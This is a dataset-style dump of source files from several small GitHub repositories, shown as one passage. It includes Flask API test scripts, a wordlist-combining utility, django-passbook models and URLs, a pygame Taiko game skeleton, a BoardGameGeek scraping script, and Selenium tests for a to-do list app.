found'\n\n\napi.add_resource(calendarDay, '/calendar')\n\n# api.add_resource('/')\n# api.add_resource(heyyou, '/heyyou',endpoint='heyyou')\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n# วิธีดู\n# \n# http://127.0.0.1:5000/calendar?date=1208\n\n# pip freeze > requirements.txt\n"
},
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.5795454382896423,
"avg_line_length": 16.799999237060547,
"blob_id": "37fc42c1346cad4cf2eb30164eb0c92fd7ab17a6",
"content_id": "308d03f8e09c3058a1addac7f903086be3a41877",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 88,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 5,
"path": "/test.py",
"repo_name": "scrape-python-supasun/api-heroku-pymongo",
"src_encoding": "UTF-8",
"text": "def number(x,y,z):\n sum = x + y + z\n return sum\nscore = number(1,2,3)\nprint(score)"
},
{
"alpha_fraction": 0.5334789156913757,
"alphanum_fraction": 0.5640465617179871,
"avg_line_length": 23.105262756347656,
"blob_id": "e08bf359e0fdffb26f886f8a7b8bdbac0f6f3103",
"content_id": "3258b4e5d7bbabb8fe842e01ac80ca47815f844d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1382,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 57,
"path": "/test2.py",
"repo_name": "scrape-python-supasun/api-heroku-pymongo",
"src_encoding": "UTF-8",
"text": "from flask_restful import Resource, Api, reqparse\nfrom flask import Flask, jsonify, render_template, request\nfrom flask_pymongo import PyMongo\nimport json\n\nfrom bson.json_util import dumps\n\napp = Flask(__name__)\n\napi = Api(app)\n\nparser = reqparse.RequestParser()\n# parser.add_argument('param1', type=str)\n# parser.add_argument('param2', type=str)\n# parser.add_argument('param3', type=str)\n\n# parser.add_argument('x', type=str)\n# parser.add_argument('y', type=str)\n\n\nparser.add_argument('num', type=str)\n\n\nclass testfun(Resource):\n def get(self):\n # เก็บparameter\n path = parser.parse_args()\n # x = int(path[\"x\"])\n # y = int(path[\"y\"])\n \n\n number = path[\"num\"]\n listThree = number.split(\",\")\n\n dict = {\n \"param1\": listThree[0],\n \"param2\": listThree[1],\n \"param3\": listThree[2]\n }\n sum = 0\n for element in listThree:\n sum += int(element)\n \n try:\n return sum\n # return path[\"param1\"] + path[\"param2\"] + path[\"param3\"]\n # http://127.0.0.1:5000/test?param1=param1¶m2=param2¶m3=param3\n # return 2 ** (x+y)\n #http://127.0.0.1:5000/test?x=3&y=2\n except:\n return 'Not found'\n\n\napi.add_resource(testfun, '/test')\n\nif __name__ == '__main__':\n app.run(debug=True)\n"
}
] | 6 |
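A stripped-down, standalone sketch of the reqparse pattern the notes above describe: parse a date query-string argument and split it into day and month. It is deliberately not wired to the project's MongoDB collection, and the /echo route name is made up:

```python
from flask import Flask
from flask_restful import Api, Resource, reqparse

app = Flask(__name__)
api = Api(app)

parser = reqparse.RequestParser()
parser.add_argument('date', type=str)


class Echo(Resource):
    def get(self):
        # e.g. GET /echo?date=1208 -> args == {'date': '1208'}
        args = parser.parse_args()
        date = args['date'] or ''
        return {'day': date[:2], 'month': date[2:]}


api.add_resource(Echo, '/echo')

if __name__ == '__main__':
    app.run(debug=True)
```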
laggiii/WordListMasher
|
https://github.com/laggiii/WordListMasher
|
d1e56f804abe4ba853211e88a5283bdab9dc8cfe
|
ef243d7291ec4d45147a1e253f0951f642af566c
|
2c302cdd0487b275025107397bb47698d3a766cf
|
refs/heads/master
| 2021-05-30T11:14:23.004631 | 2015-10-04T20:14:54 | 2015-10-04T20:14:54 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6850725412368774,
"alphanum_fraction": 0.7047262787818909,
"avg_line_length": 29.98550796508789,
"blob_id": "1618855115e0c87c73d803c8069ac226040b6914",
"content_id": "d37bbbb365bcf755dfdeb0cd603c897b47148ce4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2137,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 69,
"path": "/wlm.py",
"repo_name": "laggiii/WordListMasher",
"src_encoding": "UTF-8",
"text": "import sys, argparse, os\n\n# Configure Application Arguments\nparser = argparse.ArgumentParser(description='Combines wordlists to form more complex ones')\nparser.add_argument(\"wordlist1\", help=\"First wordlist input path\")\nparser.add_argument(\"wordlist2\", help=\"Second wordlist input path\")\nparser.add_argument(\"destination\", help=\"Output file destination\")\nparser.add_argument(\"-n\", \"--number\", help=\"Set upper maximum of number generation range\", type=int)\nargs = parser.parse_args()\n\n# Set Variables\nword1 = args.wordlist1\nword2 = args.wordlist2 \ndest = args.destination\n\n# Perform File Actions\nwordList1 = open(word1, 'r')\nwordList2 = open(word2, 'r')\nwordListMerge = open(\"tmp\", 'w')\nwordListMerge.close()\nwordListMerge = open(\"tmp\", 'a')\nwordListFinal = open(dest, 'w')\nwordListFinal.close()\nwordListFinal = open(dest, 'a')\n\nprint (\"[INFO] Input: \" + word1)\nprint (\"[INFO] Input: \" + word2)\nprint (\"[INFO] Output: \" + dest)\nprint (\"[INFO] Num Range: 0-\" + str(args.number))\n\nprint (\"[INFO] Starting List1 + List2 Merge\")\nfor line in wordList1:\n\tline = line.rstrip()\n\tfor line2 in wordList2:\n\t\tline2 = line2.rstrip() \n\t\twordListMerge.write(line + line2 + \"\\n\")\n\t\twordList2 = open(\"wordList2\")\n\twordList1 = open(\"wordList1\")\nprint(\"[INFO] Completed L1 + L2 Merge\")\n\nprint(\"[INFO] Starting List2 + List1 Merge\")\nfor line in wordList2:\n\tline = line.rstrip()\n\tfor line2 in wordList1:\n\t\tline2 = line2.rstrip() \n\t\twordListMerge.write(line + line2 + \"\\n\")\n\t\twordList1 = open(\"wordList1\")\n\twordList2 = open(\"wordList2\")\nprint(\"[INFO] Completed L2 + L1 Merge\")\n\nif args.number:\n\tprint(\"[INFO] Starting Number Addition\")\n\twordListMerge = open(\"tmp\", 'r')\n\tfor line in wordListMerge:\n\t\tline = line.rstrip()\n\t\tfor number in range(0, args.number):\n\t\t\twordListFinal.write(line + str(number) + \"\\n\")\n\t\twordListMerge = open(\"tmp\", 'r')\n\tprint(\"[INFO] Finished number addition\")\n\twordListMerge.close()\n\tos.remove(\"tmp\")\nelse:\n\twordListMerge = open(\"tmp\", 'r')\n\tfor line in wordListMerge:\n\t\tline = line.rstrip()\n\t\twordListFinal.write(line)\n\twordListMerge.close()\n\tos.remove(\"tmp\")\nprint(\"[INFO] Completed Merge: View \" + dest + \" for complete wordlist\")"
},
{
"alpha_fraction": 0.7615894079208374,
"alphanum_fraction": 0.7748344540596008,
"avg_line_length": 24.16666603088379,
"blob_id": "1d7bf415183ec29d3c3c3ef4826d269d28f265af",
"content_id": "425476d06bb2c1a66f2871875dd5370cd19c95b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 151,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 6,
"path": "/README.md",
"repo_name": "laggiii/WordListMasher",
"src_encoding": "UTF-8",
"text": "# WordListMasher\nPython WordList Combiner\n\n# Usage\n`wlm.py input1 input2 destination [-n int]`\n-n ; maximum number in range to generate after mutation\n"
}
] | 2 |
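The nested merge loops in wlm.py compute the cartesian product of the two wordlists in both orders. The same mash can be written with itertools.product; this sketch reads both files fully into memory, so it only suits wordlists that fit in RAM (the function name mash is mine, not part of the tool):

```python
import itertools


def mash(path1, path2, dest, number=None):
    with open(path1) as f1, open(path2) as f2:
        words1 = [w.rstrip() for w in f1]
        words2 = [w.rstrip() for w in f2]
    with open(dest, 'w') as out:
        # product(A, B) then product(B, A) mirrors the two merge passes in wlm.py
        for a, b in itertools.chain(itertools.product(words1, words2),
                                    itertools.product(words2, words1)):
            if number:
                for n in range(number):  # optional numeric suffixes, like the -n flag
                    out.write(a + b + str(n) + '\n')
            else:
                out.write(a + b + '\n')
```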
mr-love/django-passbook
|
https://github.com/mr-love/django-passbook
|
983cf33f66b7599149e4004eeeb7c2b02379eb2d
|
1c8907770f5e16dff80a53adc9bdc213b10cb1fa
|
41ef9b9c343d2eb5e6426b1fd24f16dac619aa83
|
refs/heads/master
| 2022-05-06T06:02:11.884134 | 2022-04-06T17:11:05 | 2022-04-06T17:18:33 | 99,647,455 | 0 | 2 |
MIT
| 2017-08-08T03:48:17 | 2021-10-11T00:21:08 | 2021-11-15T20:37:13 |
Python
|
[
{
"alpha_fraction": 0.5343642830848694,
"alphanum_fraction": 0.5773195624351501,
"avg_line_length": 23.25,
"blob_id": "75d14a4279218dce7a42625249e0593fafe251c2",
"content_id": "34824eaea2e8cff675e90f4a7de98a67611472e9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 582,
"license_type": "permissive",
"max_line_length": 51,
"num_lines": 24,
"path": "/django_passbook/migrations/0002_push_token.py",
"repo_name": "mr-love/django-passbook",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.14 on 2018-07-16 02:55\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('django_passbook', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='pass',\n options={'verbose_name': 'passes'},\n ),\n migrations.AlterField(\n model_name='registration',\n name='push_token',\n field=models.CharField(max_length=255),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5930232405662537,
"alphanum_fraction": 0.6002907156944275,
"avg_line_length": 42,
"blob_id": "d3267aa47a41835857e6990adc94cf6b3c29df78",
"content_id": "0e8c0b855bf7f8b6ec6e2fbb32e38477d313c164",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 688,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 16,
"path": "/django_passbook/urls.py",
"repo_name": "mr-love/django-passbook",
"src_encoding": "UTF-8",
"text": "from django.urls import re_path\nfrom django_passbook.views import register_pass, latest_version, registrations, log\n\nurlpatterns = [\n re_path(\n r'^v1/devices/(?P<device_library_id>.+)/registrations/(?P<pass_type_id>[\\w\\.\\d]+)/(?P<serial_number>.+)$',\n register_pass\n ),\n re_path(\n r'^v1/devices/(?P<device_library_id>.+)/registrations/(?P<pass_type_id>[\\w\\.\\d]+)/(?P<serial_number>.+)$',\n register_pass\n ),\n re_path(r'^v1/devices/(?P<device_library_id>.+)/registrations/(?P<pass_type_id>[\\w\\.\\d]+)$', registrations),\n re_path(r'^v1/passes/(?P<pass_type_id>[\\w\\.\\d]+)/(?P<serial_number>.+)$', latest_version),\n re_path(r'^v1/log$', log),\n]\n"
},
{
"alpha_fraction": 0.5431472063064575,
"alphanum_fraction": 0.5600676536560059,
"avg_line_length": 35.9375,
"blob_id": "1ee57a284831d851f72c5e6ecf46cedab2b9ec58",
"content_id": "cc3c865fe49e40c3b2ef91d31471155779224734",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1773,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 48,
"path": "/django_passbook/migrations/0001_initial.py",
"repo_name": "mr-love/django-passbook",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.4 on 2017-08-08 00:10\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Log',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('message', models.TextField()),\n ],\n ),\n migrations.CreateModel(\n name='Pass',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('pass_type_identifier', models.CharField(max_length=255)),\n ('serial_number', models.CharField(max_length=255)),\n ('authentication_token', models.CharField(max_length=255)),\n ('data', models.FileField(upload_to='passes')),\n ('updated_at', models.DateTimeField()),\n ],\n ),\n migrations.CreateModel(\n name='Registration',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('device_library_identifier', models.CharField(max_length=64)),\n ('push_token', models.CharField(max_length=64)),\n ('pazz', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='django_passbook.Pass')),\n ],\n ),\n migrations.AlterUniqueTogether(\n name='pass',\n unique_together=set([('pass_type_identifier', 'serial_number')]),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6969407200813293,
"alphanum_fraction": 0.6978967785835266,
"avg_line_length": 28.885713577270508,
"blob_id": "6c6a7f6e6e2cd2dfc4d9605e632d1fae8ac12f6c",
"content_id": "de53a176e92e87d16f945adf756c120e85558a8d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1046,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 35,
"path": "/django_passbook/admin.py",
"repo_name": "mr-love/django-passbook",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom django_passbook.models import Pass, Registration, Log\nfrom django_passbook import settings\nfrom apns3 import APNs, Payload\n\n\ndef push_update(modeladmin, request, queryset):\n for r in queryset.all():\n # FIXME: use different certificates for different stores\n apns = APNs(use_sandbox=False,\n cert_file=settings.PASSBOOK_CERT,\n key_file=settings.PASSBOOK_CERT_KEY)\n apns.gateway_server.send_notification(r.push_token, Payload())\n\n\npush_update.short_description = \"Send a push notification to update Pass\"\n\n\[email protected](Registration)\nclass RegistrationAdmin(admin.ModelAdmin):\n list_display = ('device_library_identifier', 'push_token', 'pazz')\n actions = [push_update]\n\n\[email protected](Pass)\nclass PassAdmin(admin.ModelAdmin):\n list_display = (\n 'serial_number', 'pass_type_identifier', 'authentication_token',\n 'updated_at',\n )\n\n\[email protected](Log)\nclass LogAdmin(admin.ModelAdmin):\n list_display = ('message',)\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.7368420958518982,
"avg_line_length": 37,
"blob_id": "9d9cc9ae708e801e3235ef813fc41d187a0a4fd3",
"content_id": "6adf1ea4326911d5e2b61c2c4486978d88804547",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 152,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 4,
"path": "/django_passbook/settings.py",
"repo_name": "mr-love/django-passbook",
"src_encoding": "UTF-8",
"text": "from django.conf import settings\n\nPASSBOOK_CERT = getattr(settings, 'PASSBOOK_CERT', '')\nPASSBOOK_CERT_KEY = getattr(settings, 'PASSBOOK_CERT_KEY', '')\n"
}
] | 5 |
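The URL patterns above map onto Apple's PassKit web service endpoints. As a rough illustration of how a device-side client would call them under my reading of Apple's spec (the hostname, identifiers and tokens are placeholders, and this snippet is not part of the package):

```python
import requests

base = 'https://example.com'  # wherever django_passbook.urls is mounted
device_id = 'DEVICE_LIBRARY_ID'
pass_type = 'pass.com.example.demo'
serial = 'SERIAL123'

# Register a device for pass updates: POST the APNs push token, authenticating
# with the pass's authentication token via the "ApplePass" scheme.
r = requests.post(
    '{}/v1/devices/{}/registrations/{}/{}'.format(base, device_id, pass_type, serial),
    json={'pushToken': 'APNS_PUSH_TOKEN'},
    headers={'Authorization': 'ApplePass AUTHENTICATION_TOKEN'},
)
print(r.status_code)  # per the spec: 201 = newly registered, 200 = already registered
```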
hibikidesu/Taiko
|
https://github.com/hibikidesu/Taiko
|
325ac9eb6322a78c9881228b940f6f856da6ef5c
|
7d8681fe9b13dc4c51b949998d890e4c3bfdb537
|
7ddd6a31340f6f36c350cd5291d243493f11ff3c
|
refs/heads/master
| 2020-05-21T07:26:45.382868 | 2019-05-10T10:09:56 | 2019-05-10T10:09:56 | 185,961,116 | 3 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5186799764633179,
"alphanum_fraction": 0.5305106043815613,
"avg_line_length": 28.200000762939453,
"blob_id": "e4aef4c4a9b138bde82ab303490c7358b1bffd28",
"content_id": "e7e30bf8a7b8f814450b40ba2596fd06f526160b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1606,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 55,
"path": "/taiko/game.py",
"repo_name": "hibikidesu/Taiko",
"src_encoding": "UTF-8",
"text": "import pygame\nimport os\nfrom .taiko import Taiko\nfrom .songselect import SongSelect\n\n\nclass Game:\n\n def __init__(self, song_path: str = \"taiko_songs\",\n *, taiko: Taiko = None, select: SongSelect = None, x: int = 1280, y: int = 720, framerate: int = 144):\n self.x = x\n self.y = y\n self.framerate = framerate\n\n self.screen = None\n self.clock = None\n self.running = False\n self.game_loaded = False\n self.state = 0\n self.songs = []\n\n self.taiko = taiko if taiko else Taiko(self)\n self.song_select = select if select else SongSelect(self)\n\n if not os.path.exists(song_path):\n os.mkdir(song_path)\n\n def run(self):\n pygame.mixer.pre_init(44100)\n pygame.init()\n self.screen = pygame.display.set_mode((self.x, self.y))\n pygame.display.set_caption(\"Taiko\")\n self.clock = pygame.time.Clock()\n\n self.running = True\n\n while self.running:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n\n if self.state == 0:\n if event.type == pygame.KEYDOWN:\n self.song_select.key_press(event.key)\n\n if not self.game_loaded and self.clock.get_fps() >= 1:\n self.game_loaded = True\n\n if self.game_loaded:\n if self.state == 0:\n self.song_select.update()\n else:\n self.taiko.update()\n self.clock.tick(self.framerate)\n"
},
{
"alpha_fraction": 0.6590909361839294,
"alphanum_fraction": 0.6590909361839294,
"avg_line_length": 21,
"blob_id": "d8552fe05ee5f5191cad5a565be327c1764d087f",
"content_id": "738718686c3088fb671077194babcf1be1184e4e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 132,
"license_type": "permissive",
"max_line_length": 41,
"num_lines": 6,
"path": "/taiko/__init__.py",
"repo_name": "hibikidesu/Taiko",
"src_encoding": "UTF-8",
"text": "from .taiko import *\nfrom .parser import *\nfrom .game import *\nfrom .songselect import *\n\n__all__ = [\"Taiko\", \"Game\", \"SongSelect\"]\n"
},
{
"alpha_fraction": 0.49757280945777893,
"alphanum_fraction": 0.5509708523750305,
"avg_line_length": 21.88888931274414,
"blob_id": "d4a069857b921b06155cfe4e136f16a6595fb343",
"content_id": "993abd6e86c2af3b2e0fc333464a91f056565617",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 412,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 18,
"path": "/taiko/taiko.py",
"repo_name": "hibikidesu/Taiko",
"src_encoding": "UTF-8",
"text": "import pygame\n\n\nclass Taiko:\n\n def __init__(self, game):\n self.game = game\n self.ms = 0\n self.__hit = [round(self.game.x / 4), round(self.game.y / 2)]\n\n def update(self):\n self.ms += round(1000 / self.game.clock.get_fps())\n\n self.game.screen.fill((255, 255, 255))\n\n pygame.draw.circle(self.game.screen, (0, 0, 0), self.__hit, 50, 0)\n\n pygame.display.flip()\n"
},
{
"alpha_fraction": 0.4545454680919647,
"alphanum_fraction": 0.4588744640350342,
"avg_line_length": 18.25,
"blob_id": "c6531bbdb12c462b2bee72c478194ab48df9e4c5",
"content_id": "b28e0e872ec20a77f524e74358b2a19e4f8d7020",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 231,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 12,
"path": "/taiko/parser.py",
"repo_name": "hibikidesu/Taiko",
"src_encoding": "UTF-8",
"text": "class Parser:\n\n def __init__(self, file):\n self.file = file\n\n self.name = \"\"\n self.author = \"\"\n self.bpm = 0\n\n def parse(self):\n with open(self.file, \"rb\") as f:\n file = f.read()\n"
},
{
"alpha_fraction": 0.515625,
"alphanum_fraction": 0.515625,
"avg_line_length": 15,
"blob_id": "b581979d9e8b355d4fc5813c3414bd77269e9902",
"content_id": "b265337edd422cce95349c60083cbf47ad3e928b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 64,
"license_type": "permissive",
"max_line_length": 26,
"num_lines": 4,
"path": "/app.py",
"repo_name": "hibikidesu/Taiko",
"src_encoding": "UTF-8",
"text": "import taiko\n\nif __name__ == \"__main__\":\n taiko.Game().run()\n"
},
{
"alpha_fraction": 0.4801980257034302,
"alphanum_fraction": 0.5297029614448547,
"avg_line_length": 23.239999771118164,
"blob_id": "823c96d5e5e3e47345e68d73cfc8f672ed3d7ad4",
"content_id": "642a1c6d5821239412c26f10669cd7fff67b02d5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 606,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 25,
"path": "/taiko/songselect.py",
"repo_name": "hibikidesu/Taiko",
"src_encoding": "UTF-8",
"text": "import pygame\n\n\nclass SongSelect:\n\n def __init__(self, game):\n self.game = game\n self.ms = 0\n\n self.curr_song = 0\n\n def key_press(self, key):\n if key not in [276, 275]:\n return\n self.curr_song += 1 if key == 276 else -1\n if self.curr_song <= -1:\n self.curr_song = len(self.game.songs) - 1\n elif self.curr_song > len(self.game.songs) - 1:\n self.curr_song = 0\n\n def update(self):\n self.ms += round(1000 / self.game.clock.get_fps())\n self.game.screen.fill((255, 255, 255))\n\n pygame.display.flip()\n"
}
] | 6 |
JuMoKan/BoardGameGeek
|
https://github.com/JuMoKan/BoardGameGeek
|
1f1d57e1d9deb7884ce12fcf5c85e936efeec880
|
8fe145a4eaf74ad645f9774d29cc001d212525a7
|
17dc836cd670173d338f696ef5c2f4082a3623e5
|
refs/heads/master
| 2023-02-01T16:32:45.433732 | 2019-02-27T08:52:59 | 2019-02-27T08:52:59 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6907216310501099,
"alphanum_fraction": 0.7172312140464783,
"avg_line_length": 25.038461685180664,
"blob_id": "1467dcfc874691ce0c74f899dd619b5774247626",
"content_id": "3d5df1cefd958f70c086c17bf2e07ff29ecc9fab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 679,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 26,
"path": "/API_Test.py",
"repo_name": "JuMoKan/BoardGameGeek",
"src_encoding": "UTF-8",
"text": "\n###Anzahl und Liste der gespielten Liste\nfrom boardgamegeek import BGGClient\nbgg = BGGClient()\n\nplays = bgg.plays(name=\"schrobe\")\nprint(\"Anzahl gespielter Spiele: %d\" % (len(plays)))\n\nl_games_played = []\n\nfor session in plays._plays:\n l_games_played.append(session.game_name)\n\t\n\t\n###Top 100 Liste, webscraped\nfrom urllib2 import urlopen\nfrom bs4 import BeautifulSoup\nquote_page = 'https://www.boardgamegeek.com/browse/boardgame'\n\npage = urlopen(quote_page)\nsoup = BeautifulSoup(page, 'html.parser')\n#print(soup)\n\ngames_top_100 = []\nfor i in range(1,100):\n games_top_100.append(soup.find('div', attrs={'id': 'results_objectname'+str(i)}).get_text())\nprint(games_top_100)\n\n"
},
{
"alpha_fraction": 0.7666666507720947,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 11.199999809265137,
"blob_id": "4c572d988664aad6400e500286f732390ef7e2c2",
"content_id": "06fa898f657c87a4285192266c7b2cd08b64f924",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 60,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 5,
"path": "/readme.txt",
"repo_name": "JuMoKan/BoardGameGeek",
"src_encoding": "UTF-8",
"text": "boardgamegeek.com API\n\n# Dependencies\n- bs4\n- boardgamegeek2"
}
] | 2 |
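A natural follow-up that API_Test.py stops just short of (and which is not in the original file): with both lists built, a set intersection shows which of the user's played games appear in the BGG top 100. This assumes l_games_played and games_top_100 from the script above:

```python
# Which played games are currently in the top 100?
played_top_100 = sorted(set(l_games_played) & set(games_top_100))
print("Played games in the top 100: %d" % len(played_top_100))
for name in played_top_100:
    print(name)
```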
Faramita2/superlists
|
https://github.com/Faramita2/superlists
|
e6c8521e23db2b3afd21819de99644e216830448
|
6784200a7706470ef6acf72700eefd2f6d8c08c9
|
52b5031414913e54bd709a1b5793e89575be16ff
|
refs/heads/master
| 2021-08-22T21:32:08.560314 | 2019-06-15T12:05:39 | 2019-06-15T12:05:39 | 188,988,589 | 0 | 0 | null | 2019-05-28T08:36:52 | 2019-06-15T12:13:11 | 2021-06-10T21:33:48 |
JavaScript
|
[
{
"alpha_fraction": 0.6287144422531128,
"alphanum_fraction": 0.630903959274292,
"avg_line_length": 32.64210510253906,
"blob_id": "a2c8c910260f20b8b3f3d12ee32963c2a3da7bb4",
"content_id": "31a2d9ec144b4bc6892a661e973af8568c6d5561",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4021,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 95,
"path": "/functional_tests/test_simple_list_creation.py",
"repo_name": "Faramita2/superlists",
"src_encoding": "UTF-8",
"text": "from .base import FunctionalTest\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n\nclass NewVisitorTest(FunctionalTest):\n\n def test_can_start_a_list_and_retrieve_it_later(self):\n # 伊迪丝听说又一个很酷的在线待办事项应用\n # 她去看了这个应用的首页\n self.browser.get(self.live_server_url)\n\n # 她主要到网页的标题和头部都包含 \"To-Do\" 这个词\n self.assertIn('To-Do', self.browser.title)\n header_text = self.browser.find_element_by_tag_name('h1').text\n self.assertIn('To-Do', header_text)\n\n # 应用邀请她输入一个待办事项\n inputbox = self.get_item_input_box()\n self.assertEqual(\n inputbox.get_attribute('placeholder'),\n 'Enter a to-do item'\n )\n\n # 她在一个文本框中输入了 \"Buy peacock feathers\" (购买孔雀羽毛)\n # 伊迪丝的爱好是使用假蝇做饵钓鱼\n inputbox.send_keys('Buy peacock feathers')\n\n # 她按回车键后, 页面更新了\n # 待办事项表格中显示了 \"1: Buy peacock feathers\"\n inputbox.send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: Buy peacock feathers')\n\n # 页面中又显示了一个文本框, 可以输入其他的待办事项\n # 她输入了 \"Use peacock feathers to make a fly\" (使用孔雀羽毛做假蝇)\n # 伊迪丝做事很有理\n inputbox = self.get_item_input_box()\n inputbox.send_keys('Use peacock feathers to make a fly')\n inputbox.send_keys(Keys.ENTER)\n # 页面再次更新, 她的清单中显示了这两个待办事项\n self.wait_for_row_in_list_table('1: Buy peacock feathers')\n self.wait_for_row_in_list_table('2: Use peacock feathers to make a fly')\n\n # 伊迪丝想知道这个网站是否会记住她的清单\n # 她看到网站为她生成了唯一的URL\n # 而且页面中有一些文字解说了这个功能\n\n # 她访问那个URL, 发现她的待办事项列表还在\n\n # 她很满意, 去睡觉了\n\n def test_multiple_users_can_start_lists_at_different_urls(self):\n # 伊迪丝新建一个待办事项清单\n self.browser.get(self.live_server_url)\n inputbox = self.get_item_input_box()\n inputbox.send_keys('Buy peacock feathers')\n inputbox.send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: Buy peacock feathers')\n\n # 她注意到清单有个唯一的URL\n edith_list_url = self.browser.current_url\n self.assertRegex(edith_list_url, '/lists/.+')\n\n # 现在一名叫做弗朗西斯的新用户访问了网站\n\n ## 我们使用一个新浏览器会话\n ## 确保伊迪丝的信息不会从cookie中泄露出去\n self.browser.quit()\n self.browser = webdriver.Chrome(self.chrome_driver_binary)\n\n # 弗朗西斯访问首页\n # 页面中看不到伊迪丝的清单\n self.browser.get(self.live_server_url)\n page_text = self.browser.find_element_by_tag_name('body').text\n self.assertNotIn('Buy peacock feathers', page_text)\n self.assertNotIn('make a fly', page_text)\n\n # 弗朗西斯输入了一个新待办事项, 新建一个清单\n # 他不像伊迪丝那么兴趣盎然\n inputbox = self.get_item_input_box()\n inputbox.send_keys('Buy milk')\n inputbox.send_keys(Keys.ENTER)\n self.wait_for_row_in_list_table('1: Buy milk')\n\n # 弗朗西斯获得了他的唯一URL\n francis_list_url = self.browser.current_url\n self.assertRegex(francis_list_url, '/lists/.+')\n self.assertNotEqual(francis_list_url, edith_list_url)\n\n # 这个页面还是没有伊迪丝的清单\n page_text = self.browser.find_element_by_tag_name('body').text\n self.assertNotIn('Buy peacock feathers', page_text)\n self.assertIn('Buy milk', page_text)\n\n # 两人都很满意, 一起睡觉了\n\n"
},
{
"alpha_fraction": 0.4406779706478119,
"alphanum_fraction": 0.6892655491828918,
"avg_line_length": 15.090909004211426,
"blob_id": "534a1d45e984f03cd7251ceeadf003a5964377ba",
"content_id": "5b366dd6d61f98c9a9fd643005db97139c6de1e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 177,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 11,
"path": "/requirements.txt",
"repo_name": "Faramita2/superlists",
"src_encoding": "UTF-8",
"text": "cycler==0.10.0\nDjango==1.11.20\ngunicorn==19.9.0\nkiwisolver==1.1.0\nnose==1.3.7\npyparsing==2.4.0\npython-dateutil==2.8.0\npytz==2019.1\nselenium==3.141.0\nsix==1.12.0\nurllib3==1.25.3\n"
},
{
"alpha_fraction": 0.6108786463737488,
"alphanum_fraction": 0.6317991614341736,
"avg_line_length": 15.448275566101074,
"blob_id": "573e17582ce80d0588af5850e04c4bef718fd3f8",
"content_id": "d9dac4521e595e3bccda0276fbecabbeb8a50683",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 634,
